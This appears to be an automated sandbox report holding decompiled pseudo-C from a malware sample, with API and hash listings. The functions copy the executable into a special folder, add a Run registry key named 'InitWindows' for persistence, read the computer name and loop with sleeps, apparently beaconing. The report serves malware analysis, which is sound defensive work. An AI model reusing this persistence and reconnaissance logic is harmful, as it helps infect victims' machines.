                                      • API ID: lstrlen$ByteCharMultiVirtualWidelstrcpy$AllocFree
                                      • String ID:
                                      • API String ID: 4006399363-0
                                      • Opcode ID: aef9de512e476804019cae72c11ad9b90a978f54c89de89488448ec66060bbee
                                      • Instruction ID: cf57898bd9297ebd289e808a5ac25e5aa556bfb0c2c1c806cc6929ad33ac5412
                                      • Opcode Fuzzy Hash: aef9de512e476804019cae72c11ad9b90a978f54c89de89488448ec66060bbee
                                      • Instruction Fuzzy Hash: F6019B31600514BBC700FFA5CD86D9E776CDF09754B00403AF901F72D1CAB88E009798
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00405944(void* __ecx) {
                                      				int _t2;
                                      
                                      				_t2 = HeapFree(GetProcessHeap(), 0, __ecx); // executed
                                      				return _t2;
                                      			}




                                      0x0040594e
                                      0x00405954

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,0040592F,00402D70,?,?,?,0040DF25,?,004057B7,?,?,00000000,?,004054CD,00000000), ref: 00405947
                                      • HeapFree.KERNEL32(00000000,?,0040DF25), ref: 0040594E
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      • Opcode ID: 6ba8b8dffc52d20c5f82015536bc0ca2373d7b8a1bf7ddcfb0b728f1c3e95a9a
                                      • Instruction ID: d49b9aef03679dac12ff8fec9ae8f831b531a03a97fa7424aa42eb660044a723
                                      • Opcode Fuzzy Hash: 6ba8b8dffc52d20c5f82015536bc0ca2373d7b8a1bf7ddcfb0b728f1c3e95a9a
                                      • Instruction Fuzzy Hash: A8A00275954101ABDE4557A09E4DB9639289744712F018554F706C5150D6E55460C735
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 95%
                                      			E0040EC15(void** __ecx, void* __eflags, char _a4, intOrPtr _a8) {
                                      				WCHAR* _v8;
                                      				char _v12;
                                      				char _v20;
                                      				void* _t44;
                                      				void* _t56;
                                      				int _t81;
                                      				char* _t85;
                                      				void** _t116;
                                      				char _t118;
                                      				void* _t120;
                                      				void* _t122;
                                      
                                      				_t122 = __eflags;
                                      				_t116 = __ecx;
                                      				E0040D1E6( &_v8); // executed
                                      				_t115 = 0xa;
                                      				_t85 =  &_v12;
                                      				E0040326D(_t85, _t115, _t122); // executed
                                      				_push(_t85);
                                      				_push(_t85);
                                      				_t44 = E0040EA59(_t116, _t85, _t116 + 0x10); // executed
                                      				E0040EA99(_t116);
                                      				_t81 = 0;
                                      				_t118 = _a4;
                                      				if(_t44 == 0) {
                                      					L4:
                                      					if(_a8 == _t81) {
                                      						L10:
                                      						_t81 = 1;
                                      					} else {
                                      						if(_t118 == 0) {
                                      							E004031FD(_t116 + 0x20,  &_v8);
                                      						}
                                      						if(E0040EB4B(_t116 + 4,  *((intOrPtr*)(_t116 + 8)), _t116 + 0x14, 0x20006, _t81) != 0) {
                                      							E004033F3( &_a4, _t116 + 0x54);
                                      							_t56 = E0040EB18(_t116 + 4,  &_a4, E00402DA3( &_v20, _t115, _t116 + 0x20), 1);
                                      							E004058FB(_a4);
                                      							E00402DFF( &_v20);
                                      							if(_t56 != 0) {
                                      								E0040EA99(_t116 + 4);
                                      								goto L10;
                                      							}
                                      						}
                                      					}
                                      				} else {
                                      					_t124 = _t118;
                                      					if(_t118 == 0) {
                                      						goto L4;
                                      					} else {
                                      						_t115 =  *((intOrPtr*)(_t116 + 0xc));
                                      						E004031FD(_t116 + 0x20, E0040D51C( &_a4,  *((intOrPtr*)(_t116 + 0xc)), _t124));
                                      						E0040D4D0(E004058FB(_a4), _t116 + 0x20);
                                      						E004033F3( &_a4, _t116 + 0x4c);
                                      						E004030FB(E00403230(_t116 + 0x20,  *((intOrPtr*)(_t116 + 0xc)), _t124, "\\"), _t124,  &_a4);
                                      						_t107 = _a4;
                                      						E004058FB(_a4);
                                      						if(CopyFileW(_v8,  *(_t116 + 0x20), 0) != 0) {
                                      							_t108 = _t116 + 0x20;
                                      							E00402FE7(_t116 + 0x20, _t115, _t120);
                                      							E004053AA(_t116 + 0x30, _t115, _t120);
                                      							E00405B00( &_v20, _t115, _t108, _t108, _t107, _t107);
                                      							E0040EB4B(_t116, 0x80000001, _t116 + 0x10, 0xf003f, 0);
                                      							E0040EB18(_t116, _t116 + 0x18,  &_v20, 3);
                                      							E0040EA99(_t116);
                                      							E00402DFF( &_v20);
                                      							goto L4;
                                      						}
                                      					}
                                      				}
                                      				E004058FB(_v12);
                                      				E004058FB(_v8);
                                      				return _t81;
                                      			}














                                      0x0040ec15
                                      0x0040ec1e
                                      0x0040ec23
                                      0x0040ec2a
                                      0x0040ec2b
                                      0x0040ec2e
                                      0x0040ec33
                                      0x0040ec34
                                      0x0040ec3c
                                      0x0040ec45
                                      0x0040ec4a
                                      0x0040ec4e
                                      0x0040ec51
                                      0x0040ed1b
                                      0x0040ed1e
                                      0x0040ed8e
                                      0x0040ed90
                                      0x0040ed20
                                      0x0040ed22
                                      0x0040ed2b
                                      0x0040ed2b
                                      0x0040ed47
                                      0x0040ed50
                                      0x0040ed6b
                                      0x0040ed75
                                      0x0040ed7d
                                      0x0040ed84
                                      0x0040ed89
                                      0x00000000
                                      0x0040ed89
                                      0x0040ed84
                                      0x0040ed47
                                      0x0040ec57
                                      0x0040ec57
                                      0x0040ec59
                                      0x00000000
                                      0x0040ec5f
                                      0x0040ec5f
                                      0x0040ec6e
                                      0x0040ec7e
                                      0x0040ec8a
                                      0x0040eca2
                                      0x0040eca7
                                      0x0040ecaa
                                      0x0040ecbe
                                      0x0040ecc7
                                      0x0040ecca
                                      0x0040ecd5
                                      0x0040ecdd
                                      0x0040ecf6
                                      0x0040ed07
                                      0x0040ed0e
                                      0x0040ed16
                                      0x00000000
                                      0x0040ed16
                                      0x0040ecbe
                                      0x0040ec59
                                      0x0040ed94
                                      0x0040ed9c
                                      0x0040eda7

                                      APIs
                                        • Part of subcall function 0040D1E6: GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0040EF1C,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040D205
                                        • Part of subcall function 0040EA59: RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 0040EA79
                                        • Part of subcall function 0040EA99: RegCloseKey.KERNEL32(?), ref: 0040EAA3
                                        • Part of subcall function 0040D51C: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040D54D
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                        • Part of subcall function 0040D4D0: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040D4D6
                                        • Part of subcall function 004033F3: lstrcpyW.KERNEL32(00000000,?), ref: 0040341D
                                        • Part of subcall function 004030FB: lstrcatW.KERNEL32 ref: 0040312B
                                      • CopyFileW.KERNEL32 ref: 0040ECB6
                                        • Part of subcall function 0040EB4B: RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,?,?), ref: 0040EB7F
                                        • Part of subcall function 0040EB4B: RegOpenKeyExW.KERNEL32 ref: 0040EB9A
                                        • Part of subcall function 0040EB18: RegSetValueExW.ADVAPI32 ref: 0040EB37
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$Filelstrcpy$CloseCopyDirectoryFolderFreeModuleNameOpenPathSpecialValueVirtuallstrcat
                                      • String ID:
                                      • API String ID: 1753458232-0
                                      • Opcode ID: c51f1018622a148cf489451707a7c4eef82341b76d5ad1e23c158eb2e4452470
                                      • Instruction ID: d9795c90dcbe92c500913e9753fc66666fda8b9358875ba125c1dc4dddbe05d4
                                      • Opcode Fuzzy Hash: c51f1018622a148cf489451707a7c4eef82341b76d5ad1e23c158eb2e4452470
                                      • Instruction Fuzzy Hash: 4D411E72610506BBC708EB62CC92CEEB72DFF54344B40453EB906765D1EF78AE25CA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E0040EA59(void** __ecx, short** _a8) {
                                      				int _v8;
                                      				signed int _t8;
                                      
                                      				_push(__ecx);
                                      				_v8 = 0;
                                      				_t8 = RegCreateKeyExW(0x80000001,  *_a8, 0, 0, 1, 1, 0, __ecx,  &_v8); // executed
                                      				if(_t8 != 0) {
                                      					return 0;
                                      				}
                                      				return (_t8 & 0xffffff00 | _v8 == 0x00000001) + 1;
                                      			}





                                      0x0040ea5c
                                      0x0040ea71
                                      0x0040ea79
                                      0x0040ea82
                                      0x00000000
                                      0x0040ea8e
                                      0x00000000

                                      APIs
                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 0040EA79
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 6c5d08f0b51f5d9bb4d2852a522280468771e7cb7a1540b5f36fb52c89871906
                                      • Instruction ID: 126e78b8e98ac1ed50b8817d6a12211ebe72c92d8cf379e140cbfae975ada2b0
                                      • Opcode Fuzzy Hash: 6c5d08f0b51f5d9bb4d2852a522280468771e7cb7a1540b5f36fb52c89871906
                                      • Instruction Fuzzy Hash: 60E0D831511215FFDB208B938E08ECB3F6CDB097F4F008515F50AA2190C2B18610D5F4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 87%
                                      			E0040D1E6(signed int* __ecx) {
                                      				char _v8;
                                      				WCHAR* _t3;
                                      				void* _t5;
                                      				signed int* _t15;
                                      
                                      				_push(__ecx);
                                      				_t15 = __ecx;
                                      				_t3 = E004059A9(0x7d0);
                                      				 *__ecx =  *__ecx & 0x00000000;
                                      				_t18 = _t3;
                                      				GetModuleFileNameW(0, _t3, 0x3e8);
                                      				_t5 = E004033AB( &_v8, _t18); // executed
                                      				E004031FD(_t15, _t5); // executed
                                      				E004058FB(_v8);
                                      				return _t15;
                                      			}







                                      0x0040d1e9
                                      0x0040d1ec
                                      0x0040d1f3
                                      0x0040d1f8
                                      0x0040d1fb
                                      0x0040d205
                                      0x0040d20f
                                      0x0040d217
                                      0x0040d21f
                                      0x0040d229

                                      APIs
                                        • Part of subcall function 004059A9: GetProcessHeap.KERNEL32(00000000,000000F4,0040DF9F,?,?,00000000,004054B9,?,?,00000000), ref: 004059AC
                                        • Part of subcall function 004059A9: HeapAlloc.KERNEL32(00000000,?,00000000,004054B9,?,?,00000000), ref: 004059B3
                                      • GetModuleFileNameW.KERNEL32(00000000,00000000,000003E8,?,00000000,?,?,0040EF1C,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040D205
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                        • Part of subcall function 004031FD: lstrcpyW.KERNEL32(00000000,00000000), ref: 00403222
                                        • Part of subcall function 004058FB: VirtualFree.KERNELBASE(00000000,00000000,00008000,0040DE38,?,?,?,?,?,00000000), ref: 00405903
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrcpylstrlen$AllocFileFreeModuleNameProcessVirtual
                                      • String ID:
                                      • API String ID: 1499825812-0
                                      • Opcode ID: 177a533f214405b643fb08ec30c3552345a1249de13f0b058c2bbfe35ae28216
                                      • Instruction ID: 9a946f24f94b4ff50d57b9b2f05cc17b86d69ab272c7eb541e2d9776995a0e06
                                      • Opcode Fuzzy Hash: 177a533f214405b643fb08ec30c3552345a1249de13f0b058c2bbfe35ae28216
                                      • Instruction Fuzzy Hash: 28E01A62704110ABD604B75ADC57BAE6A6DDFC5366F00003AF606F61C1DEB85E0196A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00402F9A(WCHAR** __ecx, WCHAR** __edx, void* __eflags) {
                                      				short _v1028;
                                      				WCHAR** _t14;
                                      				WCHAR** _t15;
                                      
                                      				_t15 = __edx;
                                      				_t14 = __ecx;
                                      				E00401052( &_v1028, 0, 0x400);
                                      				ExpandEnvironmentStringsW( *_t15,  &_v1028, 0x1ff);
                                      				E004033AB(_t14,  &_v1028); // executed
                                      				return _t14;
                                      			}






                                      0x00402fb3
                                      0x00402fb5
                                      0x00402fb7
                                      0x00402fcd
                                      0x00402fdc
                                      0x00402fe6

                                      APIs
                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00402FCD
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$EnvironmentExpandStringslstrcpy
                                      • String ID:
                                      • API String ID: 1709970682-0
                                      • Opcode ID: 1dfad4109f9e07a857ade1fe60dd524b7fe5146563b8e9d45bc8268b90e57e62
                                      • Instruction ID: a89e190ee82d814135067a27a3fc928841fbca027b88ab2bf95e34edfac780c1
                                      • Opcode Fuzzy Hash: 1dfad4109f9e07a857ade1fe60dd524b7fe5146563b8e9d45bc8268b90e57e62
                                      • Instruction Fuzzy Hash: 6FE048B660011867DB20A6169C46FDA776DDFC4718F040079BB09F21D0E9B4DA4687A8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040D7A6(WCHAR** __ecx) {
                                      				long _v8;
                                      				short _v40;
                                      				signed int _t16;
                                      				WCHAR** _t21;
                                      
                                      				_t21 = __ecx;
                                      				_v8 = 0x10;
                                      				_t16 = 8;
                                      				memset( &_v40, 0, _t16 << 2);
                                      				GetComputerNameW( &_v40,  &_v8); // executed
                                      				E004033AB(_t21,  &_v40); // executed
                                      				return _t21;
                                      			}







                                      0x0040d7b0
                                      0x0040d7b2
                                      0x0040d7b9
                                      0x0040d7bf
                                      0x0040d7c9
                                      0x0040d7d5
                                      0x0040d7df

                                      APIs
                                      • GetComputerNameW.KERNEL32(?,00000010), ref: 0040D7C9
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,00000000,?,0040F5B0,00000000,?,00000000), ref: 004033B4
                                        • Part of subcall function 004033AB: lstrlenW.KERNEL32(0040F5B0,?,0040F5B0,00000000,?,00000000), ref: 004033CB
                                        • Part of subcall function 004033AB: lstrcpyW.KERNEL32(?,0040F5B0), ref: 004033E6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$ComputerNamelstrcpy
                                      • String ID:
                                      • API String ID: 461527575-0
                                      • Opcode ID: dbdeb2ad42beadd3c8bd2260592bb393b6893c01dd556616a1bf03803acfcebc
                                      • Instruction ID: bdf8a31a04c2b106fc7329d36d5f9aeef1b2fed5eef025c8d1edc5b18d29901e
                                      • Opcode Fuzzy Hash: dbdeb2ad42beadd3c8bd2260592bb393b6893c01dd556616a1bf03803acfcebc
                                      • Instruction Fuzzy Hash: 79E01A72A0411CA7CF14DAAAD9499CFBBFCEB88754F100466E901F7180DAB5AF4987A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E004030FB(WCHAR** __ecx, void* __eflags, WCHAR** _a4) {
                                      				void* _t4;
                                      				WCHAR* _t6;
                                      				WCHAR** _t8;
                                      				WCHAR** _t14;
                                      
                                      				_t14 = _a4;
                                      				_t8 = __ecx;
                                      				_t4 = E00403027(_t14);
                                      				_t6 = E0040589C( *((intOrPtr*)(__ecx)), 4 + (_t4 + E00403027(__ecx)) * 2); // executed
                                      				 *_t8 = _t6;
                                      				return lstrcatW(_t6,  *_t14);
                                      			}







                                      0x00403101
                                      0x00403104
                                      0x00403108
                                      0x00403121
                                      0x00403126
                                      0x00403135

                                      APIs
                                        • Part of subcall function 00403027: lstrlenW.KERNEL32(?,0040340C,?,?,?,0040EE0E,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 0040302E
                                      • lstrcatW.KERNEL32 ref: 0040312B
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcatlstrlen
                                      • String ID:
                                      • API String ID: 1475610065-0
                                      • Opcode ID: e5442f1307ba62136afd97d8fff82842ab528cde5e7ad936f2e4bc3c50cf249e
                                      • Instruction ID: 0635443dc7dac3c59bdfe9f658cb2a12e24310b35697f9e589b7930ca1a94137
                                      • Opcode Fuzzy Hash: e5442f1307ba62136afd97d8fff82842ab528cde5e7ad936f2e4bc3c50cf249e
                                      • Instruction Fuzzy Hash: 36E026323002106BCB01AF66EC84CAEBB9EEF85365704003BFA05D7251EE365C10CBE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 58%
                                      			E0040536C(void* __ecx, void* __eflags) {
                                      
                                      				E00402F89(__ecx);
                                      				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                                      				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                      				 *((intOrPtr*)(__ecx + 0x30)) = 0;
                                      				 *((intOrPtr*)(__ecx + 0x34)) = 0;
                                      				E0040DDC0(__ecx + 0x1d8, __ecx);
                                      				__imp__#115(2, __ecx + 0x38); // executed
                                      				 *(__ecx + 0xc) =  *(__ecx + 0xc) | 0xffffffff;
                                      				 *((intOrPtr*)(__ecx + 0x18)) = 0;
                                      				 *((intOrPtr*)(__ecx + 0x24)) = 0;
                                      				return __ecx;
                                      			}



                                      0x00405370
                                      0x00405377
                                      0x0040537a
                                      0x00405384
                                      0x00405387
                                      0x0040538a
                                      0x00405395
                                      0x0040539b
                                      0x004053a1
                                      0x004053a4
                                      0x004053a9

                                      APIs
                                        • Part of subcall function 0040DDC0: CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040DA06,?,?,0040DF81,?,?,00000000,004054B9,?,?,00000000), ref: 0040DDC8
                                      • WSAStartup.WS2_32(00000002,?), ref: 00405395
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateMutexStartup
                                      • String ID:
                                      • API String ID: 3730780901-0
                                      • Opcode ID: baa3fc17b0248c4283b4fca553cb06536fe40c7224b5286a556a19cd5e85852e
                                      • Instruction ID: f5eca36c68788924e911baf6f0b04bd194a72abfb5e86dc23186084cc7b6b86c
                                      • Opcode Fuzzy Hash: baa3fc17b0248c4283b4fca553cb06536fe40c7224b5286a556a19cd5e85852e
                                      • Instruction Fuzzy Hash: 37E0C971911B118BC274AF2B9A45897FBF8FF907207005A1FA5A682AA0C7B4A509CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00401E8E(void** __ecx, _Unknown_base(*)()* _a4, void* _a8) {
                                      				void* _t8;
                                      				void** _t13;
                                      
                                      				_t13 = __ecx;
                                      				_t8 = CreateThread(0, 0, _a4, _a8, 0, __ecx + 4); // executed
                                      				 *_t13 = _t8;
                                      				return 0 | _t8 != 0x00000000;
                                      			}





                                      0x00401e92
                                      0x00401ea3
                                      0x00401eab
                                      0x00401eb6

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401EA3
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread
                                      • String ID:
                                      • API String ID: 2422867632-0
                                      • Opcode ID: 9833c7ac8ab7887e89c0ffe9bc6b052ab53fcfd75cea5b242e43b8bba9ce0e22
                                      • Instruction ID: a31c05f95a2705ac5e77bcdc3af03b55ed3d173fdf1d051a2f1c7b1ecc077b7e
                                      • Opcode Fuzzy Hash: 9833c7ac8ab7887e89c0ffe9bc6b052ab53fcfd75cea5b242e43b8bba9ce0e22
                                      • Instruction Fuzzy Hash: 28D05EB71042097FAB059FA8AC00CE77BDCEF18210301843ABA89CA100E671DC209BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040D8CD(intOrPtr* __ecx, CHAR** _a4) {
                                      				intOrPtr* _t10;
                                      
                                      				_t10 = __ecx;
                                      				E00402EEB(__ecx + 4, _a4); // executed
                                      				 *_t10 = CreateEventA(0, 1, 0,  *(_t10 + 4));
                                      				return 1;
                                      			}




                                      0x0040d8d5
                                      0x0040d8da
                                      0x0040d8ee
                                      0x0040d8f6

                                      APIs
                                        • Part of subcall function 00402EEB: lstrcatA.KERNEL32(00000000,?,?,00000000,?,0040338A,00000000,00000000,?,004049AA,?,?,?,?,?), ref: 00402F17
                                      • CreateEventA.KERNEL32(00000000,00000001,00000000,?,?), ref: 0040D8E8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateEventlstrcat
                                      • String ID:
                                      • API String ID: 2275612694-0
                                      • Opcode ID: c9bb438ae92a46f0909a3f03c93044d82bdca417565dbc956c3fa41333a619d0
                                      • Instruction ID: 07b0d8bca42cfc98e21ea6038bc4c00e6f6be2aca032b59bbda8e163674538c9
                                      • Opcode Fuzzy Hash: c9bb438ae92a46f0909a3f03c93044d82bdca417565dbc956c3fa41333a619d0
                                      • Instruction Fuzzy Hash: 4ED017722442057BE710EAA1DD06F96BB29EB51760F008026F65996590DBB1A020C6A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040DDC0(void** __ecx) {
                                      				void* _t5;
                                      				void** _t10;
                                      
                                      				_t10 = __ecx;
                                      				_t5 = CreateMutexA(0, 0, 0); // executed
                                      				 *_t10 = _t5;
                                      				_t10[1] = 0 | _t5 != 0xffffffff;
                                      				return _t10;
                                      			}





                                      0x0040ddc3
                                      0x0040ddc8
                                      0x0040ddd0
                                      0x0040ddda
                                      0x0040ddde

                                      APIs
                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,0040DA06,?,?,0040DF81,?,?,00000000,004054B9,?,?,00000000), ref: 0040DDC8
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateMutex
                                      • String ID:
                                      • API String ID: 1964310414-0
                                      • Opcode ID: 1c00198725ec014aba790d42660317b372c74746e568cf1a60557972ffb63291
                                      • Instruction ID: 07bd7781ce9137685e67f9b4f686359db9f387ea5e92b63b7d165c76255a07c3
                                      • Opcode Fuzzy Hash: 1c00198725ec014aba790d42660317b372c74746e568cf1a60557972ffb63291
                                      • Instruction Fuzzy Hash: 90D012B15005215FE324DF395C088A7B6DDDF99720315CF39B4A5C72D4E5708C518760
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040EA99(void** __ecx) {
                                      				long _t1;
                                      				signed int* _t3;
                                      
                                      				_t3 = __ecx;
                                      				if( *__ecx != 0) {
                                      					_t1 = RegCloseKey( *__ecx); // executed
                                      				}
                                      				 *_t3 =  *_t3 & 0x00000000;
                                      				return _t1;
                                      			}





                                      0x0040ea9a
                                      0x0040ea9f
                                      0x0040eaa3
                                      0x0040eaa3
                                      0x0040eaa9
                                      0x0040eaad

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: dae7f6f74e01043dfa329407c6c134171b71ec0e02b544983ae185f9a983359b
                                      • Instruction ID: 8c4ac19d1c85d71738d46c5a306d752660919070035a20ed957b2889832e0c3c
                                      • Opcode Fuzzy Hash: dae7f6f74e01043dfa329407c6c134171b71ec0e02b544983ae185f9a983359b
                                      • Instruction Fuzzy Hash: 93C04C35110221CFE7351F14F40479177E4AB45312F25096E94C0551A4E7B908E1DA88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040D4D6
                                      Memory Dump Source
                                      • Source File: 00000007.00000002.1181598002.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_7_2_400000_efwhixxln.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateDirectory
                                      • String ID:
                                      • API String ID: 4241100979-0
                                      • Opcode ID: 671add6af4e9af37d0c901fd18cea1371dbf89a0f092b1388cd69bf32bf3acda
                                      • Instruction ID: 4756d4c00611f9a9e908fe26c5d178335cfb5634c53c8157359128b798ed8997
                                      • Opcode Fuzzy Hash: 671add6af4e9af37d0c901fd18cea1371dbf89a0f092b1388cd69bf32bf3acda
                                      • Instruction Fuzzy Hash: 44B012303E520057DA011BB0DC06F143610974AB07F2045B0F113C90E0C6A200105604
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E0040496D(void* __ecx, void* __edx, void* __eflags) {
                                      				signed int _v12;
                                      				signed int _v20;
                                      				void* _t18;
                                      				short** _t20;
                                      				void* _t22;
                                      				void* _t24;
                                      				void* _t33;
                                      				void* _t34;
                                      				void* _t35;
                                      				intOrPtr _t37;
                                      				void* _t38;
                                      
                                      				_t38 = __eflags;
                                      				_t33 = __edx;
                                      				_t34 = __ecx;
                                      				 *((intOrPtr*)(__ecx + 0x234)) = 1;
                                      				_t35 = __ecx + 0x1e4;
                                      				do {
                                      					_t26 = _t35;
                                      					_t18 = E004056C3(_t35,  &_v20); // executed
                                      					_t20 = E004056C3(_t35,  &_v12); // executed
                                      					E0040331A(_t20, _t37); // executed
                                      					_t22 = E00405294(_t34 + 4, _t38, _t26,  *((intOrPtr*)(_t18 + 4))); // executed
                                      					E004058FB(_v12);
                                      					_v12 = _v12 & 0x00000000;
                                      					_t24 = E004058FB(_v20);
                                      					_v20 = _v20 & 0x00000000;
                                      					_t39 = _t22;
                                      					if(_t22 != 0) {
                                      						_t24 = E004050CC(_t34 + 4, _t33, _t39, _t34); // executed
                                      					}
                                      					Sleep( *(_t34 + 0x210));
                                      					_t35 = _t34 + 0x1e4;
                                      				} while ( *((intOrPtr*)(_t34 + 0x234)) != 0);
                                      				return _t24;
                                      			}














                                      0x0040496d
                                      0x0040496d
                                      0x00404976
                                      0x00404978
                                      0x00404982
                                      0x00404988
                                      0x0040498b
                                      0x0040498e
                                      0x0040499e
                                      0x004049a5
                                      0x004049ad
